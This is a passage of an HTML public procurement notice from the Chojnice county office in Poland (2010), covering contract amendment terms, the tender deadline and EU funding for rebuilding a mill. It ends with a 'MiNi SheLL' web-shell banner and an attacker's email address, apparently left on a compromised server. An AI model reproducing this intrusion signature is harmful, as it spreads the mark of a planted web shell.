4)	zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
5)	wystąpienie siły wyższej,
6)	skrócenia terminu zakończenia realizacji umowy na pisemny wniosek Wykonawcy,  
7)	sądowej waloryzacji zamówienia,
8)	wstrzymania przez zamawiającego wykonywania prac nie wynikających z okoliczności leżących po stronie wykonawcy.
W przypadku zmiany terminu realizacji przedmiotu umowy, wymienionych w pkt 1-8, termin ten może ulec przedłużeniu nie dłużej jednak niż o czas trwania tych okoliczności.

2. Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zamiany podwykonawców w przypadku:
1)	wprowadzenia nowego podwykonawcy,
2)	rezygnacji podwykonawcy,
3)	zmiany wartości lub zakresu robót wykonywanych przez podwykonawców.
      Zamawiający może wyrazić zgodę na powyższe, po pisemnym zaakceptowaniu umowy wykonawcy z podwykonawcą w terminie 14 dni od przekazania tej umowy przez wykonawcę.

3. Powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Powyższe postanowienia nie stanowią zobowiązania zamawiającego do wyrażenia zgody na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.chojnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Chojnicach, ul. 31 Stycznia 56, 89-600 Chojnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2010 godzina 09:00, miejsce: Biuro Obsługi Interesanta Starostwa Powiatowego w Chojnicach, ul. 31 Stycznia 56.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie nr 2: Centrum Edukacyjno-Wdrożeniowe w Chojnicach. Przebudowa, rozbudowa i zmiana sposobu użytkowania budynku Młyna Chojnickiego w ramach projektu Centrum Edukacyjno - Wdrożeniowe w Chojnicach realizowanego w ramach Regionalnego Programu Operacyjnego dla Województwa pomorskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com